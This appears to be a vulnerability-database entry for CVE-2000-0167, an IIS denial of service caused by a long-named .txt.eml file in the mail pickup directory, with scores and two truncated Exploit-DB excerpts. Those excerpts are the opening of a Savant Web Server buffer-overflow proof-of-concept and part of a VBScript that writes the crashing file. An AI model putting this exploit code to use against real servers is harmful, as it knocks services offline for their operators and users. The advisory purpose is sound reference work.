CVE-2000-0167
Published 2000-02-15

CVE-2000-0167: IIS Inetinfo.exe allows local users to cause a denial of service by creating a mail file with a long name and a .txt.eml extension in the pickup directory.
Priority: P4 · 10 · low
CVSS 2.0: 2.1 (AV:L/AC:L/Au:N/C:N/I:N/A:P)
EXPLOIT
EPSS: 2.71% (84.1th percentile)
Affected: 1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_information_server | — | — |
No detection rules found.
Exploit-DB
Michael Lamont Savant Web Server 2.1/3.0 - Remote Buffer Overflow
exploitdb·2000-07-03
CVE-2000-0641 Michael Lamont Savant Web Server 2.1/3.0 - Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/1453/info
A buffer overflow exists in the Savant Web Server. It is possible to exploit this overflow by sending an unusually long GET request to the server.
/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
* Written by Wizdumb
*
* The overflow occurs when the server receives too many headers in the GET
* request. The results of the attack look something like...
*
* SAVANT caused an invalid page fault
* in module KERNEL32.DLL at 015f:bff87eb5.
*
* Registers:
*
* EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
* EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
* ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
* EDX=bff76859 ES=0167 EDI=010a020c GS=0000
*
* B
Exploit-DB
Microsoft IIS 4.0 - Pickup Directory Denial of Service
exploitdb·2000-02-15
CVE-2000-0167 Microsoft IIS 4.0 - Pickup Directory Denial of Service
---
source: https://www.securityfocus.com/bid/1819/info
An email with a filename consisting of over 86 characters and an extension of .txt.eml will cause Microsoft IIS to crash if placed in the \mailroot\pickup directory. The process inetinfo.exe will crash, resulting in a Dr. Watson access violation error. Restarting IIS is required in order to regain normal functionality.
' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"
Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
Thefile.writeline "X-Sender: [email protected]"
Thefile.writeline "X-Receiver: [email protected]"
Thefile.writeline "From: "
The
No writeups or analysis indexed.
Published: 2000-02-15